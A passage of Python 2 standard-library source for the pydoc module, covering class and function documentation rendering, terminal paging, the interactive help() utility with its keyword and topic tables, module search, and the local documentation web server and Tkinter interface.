key, value in classes: contents.append(self.document(value, key, name)) result = result + self.section('CLASSES', join(contents, '\n')) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name)) result = result + self.section('FUNCTIONS', join(contents, '\n')) if data: contents = [] for key, value in data: contents.append(self.docother(value, key, name, maxlen=70)) result = result + self.section('DATA', join(contents, '\n')) if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) result = result + self.section('VERSION', version) if hasattr(object, '__date__'): result = result + self.section('DATE', _binstr(object.__date__)) if hasattr(object, '__author__'): result = result + self.section('AUTHOR', _binstr(object.__author__)) if hasattr(object, '__credits__'): result = result + self.section('CREDITS', _binstr(object.__credits__)) return result def docclass(self, object, name=None, mod=None, *ignored): """Produce text documentation for a given class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ def makename(c, m=object.__module__): return classname(c, m) if name == realname: title = 'class ' + self.bold(realname) else: title = self.bold(name) + ' = class ' + realname if bases: parents = map(makename, bases) title = title + '(%s)' % join(parents, ', ') doc = getdoc(object) contents = doc and [doc + '\n'] or [] push = contents.append # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: push("Method resolution order:") for base in mro: push(' ' + makename(base)) push('') # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('-' * 70) self.needone = 1 hr = HorizontalRule() def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. 
# (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, object)) return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getdoc(value) else: doc = None push(self.docother(getattr(object, name), name, mod, maxlen=70, doc=doc) + '\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = "defined here" else: tag = "inherited from %s" % classname(thisclass, object.__module__) # Sort attrs by name. attrs.sort() # Pump out the attrs, segregated by kind. attrs = spill("Methods %s:\n" % tag, attrs, lambda t: t[1] == 'method') attrs = spill("Class methods %s:\n" % tag, attrs, lambda t: t[1] == 'class method') attrs = spill("Static methods %s:\n" % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata("Data and other attributes %s:\n" % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = '\n'.join(contents) if not contents: return title + '\n' return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n' def formatvalue(self, object): """Format an argument default value as text.""" return '=' + self.repr(object) def docroutine(self, object, name=None, mod=None, cl=None): """Produce text documentation for a function or method object.""" realname = object.__name__ name = name or realname note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + classname(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % classname( object.im_self.__class__, mod) else: note = ' unbound %s method' % classname(imclass,mod) object = object.im_func if name == realname: title = self.bold(realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): skipdocs = 1 title = self.bold(name) + ' = ' + realname if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = self.bold(name) + ' lambda ' argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + note if skipdocs: return decl + '\n' else: doc = getdoc(object) or '' return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n') def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push(self.bold(name)) push('\n') doc = getdoc(value) or '' if doc: push(self.indent(doc)) push('\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce text documentation for a property.""" return self._docdescriptor(name, object, mod) def docdata(self, object, name=None, mod=None, cl=None): """Produce text documentation for a data 
descriptor.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None): """Produce text documentation for a data object.""" repr = self.repr(object) if maxlen: line = (name and name + ' = ' or '') + repr chop = maxlen - len(line) if chop < 0: repr = repr[:chop] + '...' line = (name and self.bold(name) + ' = ' or '') + repr if doc is not None: line += '\n' + self.indent(str(doc)) return line # --------------------------------------------------------- user interfaces def pager(text): """The first time this is called, determine what kind of pager to use.""" global pager pager = getpager() pager(text) def getpager(): """Decide what method to use for paging through text.""" if type(sys.stdout) is not types.FileType: return plainpager if not hasattr(sys.stdin, "isatty"): return plainpager if not sys.stdin.isatty() or not sys.stdout.isatty(): return plainpager if 'PAGER' in os.environ: if sys.platform == 'win32': # pipes completely broken in Windows return lambda text: tempfilepager(plain(text), os.environ['PAGER']) elif os.environ.get('TERM') in ('dumb', 'emacs'): return lambda text: pipepager(plain(text), os.environ['PAGER']) else: return lambda text: pipepager(text, os.environ['PAGER']) if os.environ.get('TERM') in ('dumb', 'emacs'): return plainpager if sys.platform == 'win32' or sys.platform.startswith('os2'): return lambda text: tempfilepager(plain(text), 'more <') if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0: return lambda text: pipepager(text, 'less') import tempfile (fd, filename) = tempfile.mkstemp() os.close(fd) try: if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0: return lambda text: pipepager(text, 'more') else: return ttypager finally: os.unlink(filename) def plain(text): """Remove boldface formatting from text.""" return re.sub('.\b', '', text) def pipepager(text, cmd): """Page through text by feeding it to another program.""" pipe = os.popen(cmd, 'w') try: pipe.write(_encode(text)) pipe.close() except IOError: pass # Ignore broken pipes caused by quitting the pager program. def tempfilepager(text, cmd): """Page through text by invoking a program on a temporary file.""" import tempfile filename = tempfile.mktemp() file = open(filename, 'w') file.write(_encode(text)) file.close() try: os.system(cmd + ' "' + filename + '"') finally: os.unlink(filename) def ttypager(text): """Page through text on a text terminal.""" lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n') try: import tty fd = sys.stdin.fileno() old = tty.tcgetattr(fd) tty.setcbreak(fd) getchar = lambda: sys.stdin.read(1) except (ImportError, AttributeError): tty = None getchar = lambda: sys.stdin.readline()[:-1][:1] try: r = inc = os.environ.get('LINES', 25) - 1 sys.stdout.write(join(lines[:inc], '\n') + '\n') while lines[r:]: sys.stdout.write('-- more --') sys.stdout.flush() c = getchar() if c in ('q', 'Q'): sys.stdout.write('\r \r') break elif c in ('\r', '\n'): sys.stdout.write('\r \r' + lines[r] + '\n') r = r + 1 continue if c in ('b', 'B', '\x1b'): r = r - inc - inc if r < 0: r = 0 sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n') r = r + inc finally: if tty: tty.tcsetattr(fd, tty.TCSAFLUSH, old) def plainpager(text): """Simply print unformatted text. 
This is the ultimate fallback.""" sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))) def describe(thing): """Produce a short description of the given thing.""" if inspect.ismodule(thing): if thing.__name__ in sys.builtin_module_names: return 'built-in module ' + thing.__name__ if hasattr(thing, '__path__'): return 'package ' + thing.__name__ else: return 'module ' + thing.__name__ if inspect.isbuiltin(thing): return 'built-in function ' + thing.__name__ if inspect.isgetsetdescriptor(thing): return 'getset descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.ismemberdescriptor(thing): return 'member descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.isclass(thing): return 'class ' + thing.__name__ if inspect.isfunction(thing): return 'function ' + thing.__name__ if inspect.ismethod(thing): return 'method ' + thing.__name__ if type(thing) is types.InstanceType: return 'instance of ' + thing.__class__.__name__ return type(thing).__name__ def locate(path, forceload=0): """Locate an object by name or dotted path, importing as necessary.""" parts = [part for part in split(path, '.') if part] module, n = None, 0 while n < len(parts): nextmodule = safeimport(join(parts[:n+1], '.'), forceload) if nextmodule: module, n = nextmodule, n + 1 else: break if module: object = module else: object = __builtin__ for part in parts[n:]: try: object = getattr(object, part) except AttributeError: return None return object # --------------------------------------- interactive interpreter interface text = TextDoc() html = HTMLDoc() class _OldStyleClass: pass _OLD_INSTANCE_TYPE = type(_OldStyleClass()) def resolve(thing, forceload=0): """Given an object or a path to an object, get the object and its name.""" if isinstance(thing, str): object = locate(thing, forceload) if not object: raise ImportError, 'no Python documentation found for %r' % thing return object, thing else: name = getattr(thing, '__name__', None) return thing, name if isinstance(name, str) else None def render_doc(thing, title='Python Library Documentation: %s', forceload=0): """Render text documentation, given an object or a path to an object.""" object, name = resolve(thing, forceload) desc = describe(object) module = inspect.getmodule(object) if name and '.' in name: desc += ' in ' + name[:name.rfind('.')] elif module and module is not object: desc += ' in module ' + module.__name__ if type(object) is _OLD_INSTANCE_TYPE: # If the passed object is an instance of an old-style class, # document its available methods instead of its value. object = object.__class__ elif not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isgetsetdescriptor(object) or inspect.ismemberdescriptor(object) or isinstance(object, property)): # If the passed object is a piece of data or an instance, # document its available methods instead of its value. 
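        # Descriptive note: this branch is why e.g. help(42) or help([]) shows the
        # documentation for int or list -- plain values fall through to here and
        # are replaced by their type before being handed to text.document() below.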
object = type(object) desc += ' object' return title % desc + '\n\n' + text.document(object, name) def doc(thing, title='Python Library Documentation: %s', forceload=0): """Display text documentation, given an object or a path to an object.""" try: pager(render_doc(thing, title, forceload)) except (ImportError, ErrorDuringImport), value: print value def writedoc(thing, forceload=0): """Write HTML documentation to a file in the current directory.""" try: object, name = resolve(thing, forceload) page = html.page(describe(object), html.document(object, name)) file = open(name + '.html', 'w') file.write(page) file.close() print 'wrote', name + '.html' except (ImportError, ErrorDuringImport), value: print value def writedocs(dir, pkgpath='', done=None): """Write out HTML documentation for all modules in a directory tree.""" if done is None: done = {} for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath): writedoc(modname) return class Helper: # These dictionaries map a topic name to either an alias, or a tuple # (label, seealso-items). The "label" is the label of the corresponding # section in the .rst file under Doc/ and an index into the dictionary # in pydoc_data/topics.py. # # CAUTION: if you change one of these dictionaries, be sure to adapt the # list of needed labels in Doc/tools/pyspecific.py and # regenerate the pydoc_data/topics.py file by running # make pydoc-topics # in Doc/ and copying the output file into the Lib/ directory. keywords = { 'and': 'BOOLEAN', 'as': 'with', 'assert': ('assert', ''), 'break': ('break', 'while for'), 'class': ('class', 'CLASSES SPECIALMETHODS'), 'continue': ('continue', 'while for'), 'def': ('function', ''), 'del': ('del', 'BASICMETHODS'), 'elif': 'if', 'else': ('else', 'while for'), 'except': 'try', 'exec': ('exec', ''), 'finally': 'try', 'for': ('for', 'break continue while'), 'from': 'import', 'global': ('global', 'NAMESPACES'), 'if': ('if', 'TRUTHVALUE'), 'import': ('import', 'MODULES'), 'in': ('in', 'SEQUENCEMETHODS2'), 'is': 'COMPARISON', 'lambda': ('lambda', 'FUNCTIONS'), 'not': 'BOOLEAN', 'or': 'BOOLEAN', 'pass': ('pass', ''), 'print': ('print', ''), 'raise': ('raise', 'EXCEPTIONS'), 'return': ('return', 'FUNCTIONS'), 'try': ('try', 'EXCEPTIONS'), 'while': ('while', 'break continue if TRUTHVALUE'), 'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'), 'yield': ('yield', ''), } # Either add symbols to this dictionary or to the symbols dictionary # directly: Whichever is easier. They are merged later. 
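    # Descriptive note: the iteritems() loop a little further below folds this
    # inverse mapping into `symbols`. For example '~' is listed under 'OPERATORS',
    # 'UNARY' and 'BITWISE' here, so its merged entry ends up holding all three
    # topic names separated by spaces; showsymbol() then takes the first word as
    # the topic to display and the rest as cross-references.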
_symbols_inverse = { 'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'), 'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&', '|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'), 'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'), 'UNARY' : ('-', '~'), 'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=', '^=', '<<=', '>>=', '**=', '//='), 'BITWISE' : ('<<', '>>', '&', '|', '^', '~'), 'COMPLEX' : ('j', 'J') } symbols = { '%': 'OPERATORS FORMATTING', '**': 'POWER', ',': 'TUPLES LISTS FUNCTIONS', '.': 'ATTRIBUTES FLOAT MODULES OBJECTS', '...': 'ELLIPSIS', ':': 'SLICINGS DICTIONARYLITERALS', '@': 'def class', '\\': 'STRINGS', '_': 'PRIVATENAMES', '__': 'PRIVATENAMES SPECIALMETHODS', '`': 'BACKQUOTES', '(': 'TUPLES FUNCTIONS CALLS', ')': 'TUPLES FUNCTIONS CALLS', '[': 'LISTS SUBSCRIPTS SLICINGS', ']': 'LISTS SUBSCRIPTS SLICINGS' } for topic, symbols_ in _symbols_inverse.iteritems(): for symbol in symbols_: topics = symbols.get(symbol, topic) if topic not in topics: topics = topics + ' ' + topic symbols[symbol] = topics topics = { 'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS ' 'FUNCTIONS CLASSES MODULES FILES inspect'), 'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING ' 'TYPES'), 'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'), 'FORMATTING': ('formatstrings', 'OPERATORS'), 'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS ' 'FORMATTING TYPES'), 'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'), 'INTEGER': ('integers', 'int range'), 'FLOAT': ('floating', 'float math'), 'COMPLEX': ('imaginary', 'complex cmath'), 'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'), 'MAPPINGS': 'DICTIONARIES', 'FUNCTIONS': ('typesfunctions', 'def TYPES'), 'METHODS': ('typesmethods', 'class def CLASSES TYPES'), 'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'), 'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'), 'FRAMEOBJECTS': 'TYPES', 'TRACEBACKS': 'TYPES', 'NONE': ('bltin-null-object', ''), 'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'), 'FILES': ('bltin-file-objects', ''), 'SPECIALATTRIBUTES': ('specialattrs', ''), 'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'), 'MODULES': ('typesmodules', 'import'), 'PACKAGES': 'import', 'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN ' 'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER ' 'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES ' 'LISTS DICTIONARIES BACKQUOTES'), 'OPERATORS': 'EXPRESSIONS', 'PRECEDENCE': 'EXPRESSIONS', 'OBJECTS': ('objects', 'TYPES'), 'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS ' 'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS ' 'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'), 'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'), 'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'), 'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'), 'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 ' 'SPECIALMETHODS'), 'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 ' 'SPECIALMETHODS'), 'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'), 'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT ' 'SPECIALMETHODS'), 'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'), 'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'), 'DYNAMICFEATURES': ('dynamic-features', ''), 'SCOPING': 'NAMESPACES', 'FRAMES': 'NAMESPACES', 'EXCEPTIONS': 
('exceptions', 'try except finally raise'), 'COERCIONS': ('coercion-rules','CONVERSIONS'), 'CONVERSIONS': ('conversions', 'COERCIONS'), 'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'), 'SPECIALIDENTIFIERS': ('id-classes', ''), 'PRIVATENAMES': ('atom-identifiers', ''), 'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS ' 'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'), 'TUPLES': 'SEQUENCES', 'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'), 'LISTS': ('typesseq-mutable', 'LISTLITERALS'), 'LISTLITERALS': ('lists', 'LISTS LITERALS'), 'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'), 'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'), 'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'), 'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ' 'ATTRIBUTEMETHODS'), 'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'), 'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'), 'CALLS': ('calls', 'EXPRESSIONS'), 'POWER': ('power', 'EXPRESSIONS'), 'UNARY': ('unary', 'EXPRESSIONS'), 'BINARY': ('binary', 'EXPRESSIONS'), 'SHIFTING': ('shifting', 'EXPRESSIONS'), 'BITWISE': ('bitwise', 'EXPRESSIONS'), 'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'), 'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'), 'ASSERTION': 'assert', 'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'), 'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'), 'DELETION': 'del', 'PRINTING': 'print', 'RETURNING': 'return', 'IMPORTING': 'import', 'CONDITIONAL': 'if', 'LOOPING': ('compound', 'for while break continue'), 'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'), 'DEBUGGING': ('debugger', 'pdb'), 'CONTEXTMANAGERS': ('context-managers', 'with'), } def __init__(self, input=None, output=None): self._input = input self._output = output input = property(lambda self: self._input or sys.stdin) output = property(lambda self: self._output or sys.stdout) def __repr__(self): if inspect.stack()[1][3] == '?': self() return '' return '<pydoc.Helper instance>' _GoInteractive = object() def __call__(self, request=_GoInteractive): if request is not self._GoInteractive: self.help(request) else: self.intro() self.interact() self.output.write(''' You are now leaving help and returning to the Python interpreter. If you want to ask for help on a particular object directly from the interpreter, you can type "help(object)". Executing "help('string')" has the same effect as typing a particular string at the help> prompt. 
''') def interact(self): self.output.write('\n') while True: try: request = self.getline('help> ') if not request: break except (KeyboardInterrupt, EOFError): break request = strip(replace(request, '"', '', "'", '')) if lower(request) in ('q', 'quit'): break self.help(request) def getline(self, prompt): """Read one line, using raw_input when available.""" if self.input is sys.stdin: return raw_input(prompt) else: self.output.write(prompt) self.output.flush() return self.input.readline() def help(self, request): if type(request) is type(''): request = request.strip() if request == 'help': self.intro() elif request == 'keywords': self.listkeywords() elif request == 'symbols': self.listsymbols() elif request == 'topics': self.listtopics() elif request == 'modules': self.listmodules() elif request[:8] == 'modules ': self.listmodules(split(request)[1]) elif request in self.symbols: self.showsymbol(request) elif request in self.keywords: self.showtopic(request) elif request in self.topics: self.showtopic(request) elif request: doc(request, 'Help on %s:') elif isinstance(request, Helper): self() else: doc(request, 'Help on %s:') self.output.write('\n') def intro(self): self.output.write(''' Welcome to Python %s! This is the online help utility. If this is your first time using Python, you should definitely check out the tutorial on the Internet at http://docs.python.org/%s/tutorial/. Enter the name of any module, keyword, or topic to get help on writing Python programs and using Python modules. To quit this help utility and return to the interpreter, just type "quit". To get a list of available modules, keywords, or topics, type "modules", "keywords", or "topics". Each module also comes with a one-line summary of what it does; to list the modules whose summaries contain a given word such as "spam", type "modules spam". ''' % tuple([sys.version[:3]]*2)) def list(self, items, columns=4, width=80): items = items[:] items.sort() colw = width / columns rows = (len(items) + columns - 1) / columns for row in range(rows): for col in range(columns): i = col * rows + row if i < len(items): self.output.write(items[i]) if col < columns - 1: self.output.write(' ' + ' ' * (colw-1 - len(items[i]))) self.output.write('\n') def listkeywords(self): self.output.write(''' Here is a list of the Python keywords. Enter any keyword to get more help. ''') self.list(self.keywords.keys()) def listsymbols(self): self.output.write(''' Here is a list of the punctuation symbols which Python assigns special meaning to. Enter any symbol to get more help. ''') self.list(self.symbols.keys()) def listtopics(self): self.output.write(''' Here is a list of available topics. Enter any topic name to get more help. ''') self.list(self.topics.keys()) def showtopic(self, topic, more_xrefs=''): try: import pydoc_data.topics except ImportError: self.output.write(''' Sorry, topic and keyword documentation is not available because the module "pydoc_data.topics" could not be found. 
''') return target = self.topics.get(topic, self.keywords.get(topic)) if not target: self.output.write('no documentation found for %s\n' % repr(topic)) return if type(target) is type(''): return self.showtopic(target, more_xrefs) label, xrefs = target try: doc = pydoc_data.topics.topics[label] except KeyError: self.output.write('no documentation found for %s\n' % repr(topic)) return pager(strip(doc) + '\n') if more_xrefs: xrefs = (xrefs or '') + ' ' + more_xrefs if xrefs: import StringIO, formatter buffer = StringIO.StringIO() formatter.DumbWriter(buffer).send_flowing_data( 'Related help topics: ' + join(split(xrefs), ', ') + '\n') self.output.write('\n%s\n' % buffer.getvalue()) def showsymbol(self, symbol): target = self.symbols[symbol] topic, _, xrefs = target.partition(' ') self.showtopic(topic, xrefs) def listmodules(self, key=''): if key: self.output.write(''' Here is a list of matching modules. Enter any module name to get more help. ''') apropos(key) else: self.output.write(''' Please wait a moment while I gather a list of all available modules... ''') modules = {} def callback(path, modname, desc, modules=modules): if modname and modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' if find(modname, '.') < 0: modules[modname] = 1 def onerror(modname): callback(None, modname, None) ModuleScanner().run(callback, onerror=onerror) self.list(modules.keys()) self.output.write(''' Enter any module name to get more help. Or, type "modules spam" to search for modules whose descriptions contain the word "spam". ''') help = Helper() class Scanner: """A generic tree iterator.""" def __init__(self, roots, children, descendp): self.roots = roots[:] self.state = [] self.children = children self.descendp = descendp def next(self): if not self.state: if not self.roots: return None root = self.roots.pop(0) self.state = [(root, self.children(root))] node, children = self.state[-1] if not children: self.state.pop() return self.next() child = children.pop(0) if self.descendp(child): self.state.append((child, self.children(child))) return child class ModuleScanner: """An interruptible scanner that searches module synopses.""" def run(self, callback, key=None, completer=None, onerror=None): if key: key = lower(key) self.quit = False seen = {} for modname in sys.builtin_module_names: if modname != '__main__': seen[modname] = 1 if key is None: callback(None, modname, '') else: desc = split(__import__(modname).__doc__ or '', '\n')[0] if find(lower(modname + ' - ' + desc), key) >= 0: callback(None, modname, desc) for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror): if self.quit: break if key is None: callback(None, modname, '') else: loader = importer.find_module(modname) if hasattr(loader,'get_source'): import StringIO desc = source_synopsis( StringIO.StringIO(loader.get_source(modname)) ) or '' if hasattr(loader,'get_filename'): path = loader.get_filename(modname) else: path = None else: module = loader.load_module(modname) desc = (module.__doc__ or '').splitlines()[0] path = getattr(module,'__file__',None) if find(lower(modname + ' - ' + desc), key) >= 0: callback(path, modname, desc) if completer: completer() def apropos(key): """Print all the one-line module summaries that contain a substring.""" def callback(path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' print modname, desc and '- ' + desc def onerror(modname): pass with warnings.catch_warnings(): warnings.filterwarnings('ignore') # ignore problems during import 
ModuleScanner().run(callback, key, onerror=onerror) # --------------------------------------------------- web browser interface def serve(port, callback=None, completer=None): import BaseHTTPServer, mimetools, select # Patch up mimetools.Message so it doesn't break if rfc822 is reloaded. class Message(mimetools.Message): def __init__(self, fp, seekable=1): Message = self.__class__ Message.__bases__[0].__bases__[0].__init__(self, fp, seekable) self.encodingheader = self.getheader('content-transfer-encoding') self.typeheader = self.getheader('content-type') self.parsetype() self.parseplist() class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler): def send_document(self, title, contents): try: self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(html.page(title, contents)) except IOError: pass def do_GET(self): path = self.path if path[-5:] == '.html': path = path[:-5] if path[:1] == '/': path = path[1:] if path and path != '.': try: obj = locate(path, forceload=1) except ErrorDuringImport, value: self.send_document(path, html.escape(str(value))) return if obj: self.send_document(describe(obj), html.document(obj, path)) else: self.send_document(path, 'no Python documentation found for %s' % repr(path)) else: heading = html.heading( '<big><big><strong>Python: Index of Modules</strong></big></big>', '#ffffff', '#7799ee') def bltinlink(name): return '<a href="%s.html">%s</a>' % (name, name) names = filter(lambda x: x != '__main__', sys.builtin_module_names) contents = html.multicolumn(names, bltinlink) indices = ['<p>' + html.bigsection( 'Built-in Modules', '#ffffff', '#ee77aa', contents)] seen = {} for dir in sys.path: indices.append(html.index(dir, seen)) contents = heading + join(indices) + '''<p align=right> <font color="#909090" face="helvetica, arial"><strong> pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>''' self.send_document('Index of Modules', contents) def log_message(self, *args): pass class DocServer(BaseHTTPServer.HTTPServer): def __init__(self, port, callback): host = 'localhost' self.address = (host, port) self.url = 'http://%s:%d/' % (host, port) self.callback = callback self.base.__init__(self, self.address, self.handler) def serve_until_quit(self): import select self.quit = False while not self.quit: rd, wr, ex = select.select([self.socket.fileno()], [], [], 1) if rd: self.handle_request() def server_activate(self): self.base.server_activate(self) if self.callback: self.callback(self) DocServer.base = BaseHTTPServer.HTTPServer DocServer.handler = DocHandler DocHandler.MessageClass = Message try: try: DocServer(port, callback).serve_until_quit() except (KeyboardInterrupt, select.error): pass finally: if completer: completer() # ----------------------------------------------------- graphical interface def gui(): """Graphical interface (starts web server and pops up a control window).""" class GUI: def __init__(self, window, port=7464): self.window = window self.server = None self.scanner = None import Tkinter self.server_frm = Tkinter.Frame(window) self.title_lbl = Tkinter.Label(self.server_frm, text='Starting server...\n ') self.open_btn = Tkinter.Button(self.server_frm, text='open browser', command=self.open, state='disabled') self.quit_btn = Tkinter.Button(self.server_frm, text='quit serving', command=self.quit, state='disabled') self.search_frm = Tkinter.Frame(window) self.search_lbl = Tkinter.Label(self.search_frm, text='Search for') self.search_ent = Tkinter.Entry(self.search_frm) 
self.search_ent.bind('<Return>', self.search) self.stop_btn = Tkinter.Button(self.search_frm, text='stop', pady=0, command=self.stop, state='disabled') if sys.platform == 'win32': # Trying to hide and show this button crashes under Windows. self.stop_btn.pack(side='right') self.window.title('pydoc') self.window.protocol('WM_DELETE_WINDOW', self.quit) self.title_lbl.pack(side='top', fill='x') self.open_btn.pack(side='left', fill='x', expand=1) self.quit_btn.pack(side='right', fill='x', expand=1) self.server_frm.pack(side='top', fill='x') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) self.search_frm.pack(side='top', fill='x') self.search_ent.focus_set() font = ('helvetica', sys.platform == 'win32' and 8 or 10) self.result_lst = Tkinter.Listbox(window, font=font, height=6) self.result_lst.bind('<Button-1>', self.select) self.result_lst.bind('<Double-Button-1>', self.goto) self.result_scr = Tkinter.Scrollbar(window, orient='vertical', command=self.result_lst.yview) self.result_lst.config(yscrollcommand=self.result_scr.set) self.result_frm = Tkinter.Frame(window) self.goto_btn = Tkinter.Button(self.result_frm, text='go to selected', command=self.goto) self.hide_btn = Tkinter.Button(self.result_frm, text='hide results', command=self.hide) self.goto_btn.pack(side='left', fill='x', expand=1) self.hide_btn.pack(side='right', fill='x', expand=1) self.window.update() self.minwidth = self.window.winfo_width() self.minheight = self.window.winfo_height() self.bigminheight = (self.server_frm.winfo_reqheight() + self.search_frm.winfo_reqheight() + self.result_lst.winfo_reqheight() + self.result_frm.winfo_reqheight()) self.bigwidth, self.bigheight = self.minwidth, self.bigminheight self.expanded = 0 self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.window.tk.willdispatch() import threading threading.Thread( target=serve, args=(port, self.ready, self.quit)).start() def ready(self, server): self.server = server self.title_lbl.config( text='Python documentation server at\n' + server.url) self.open_btn.config(state='normal') self.quit_btn.config(state='normal') def open(self, event=None, url=None): url = url or self.server.url try: import webbrowser webbrowser.open(url) except ImportError: # pre-webbrowser.py compatibility if sys.platform == 'win32': os.system('start "%s"' % url) else: rc = os.system('netscape -remote "openURL(%s)" &' % url) if rc: os.system('netscape "%s" &' % url) def quit(self, event=None): if self.server: self.server.quit = 1 self.window.quit() def search(self, event=None): key = self.search_ent.get() self.stop_btn.pack(side='right') self.stop_btn.config(state='normal') self.search_lbl.config(text='Searching for "%s"...' 
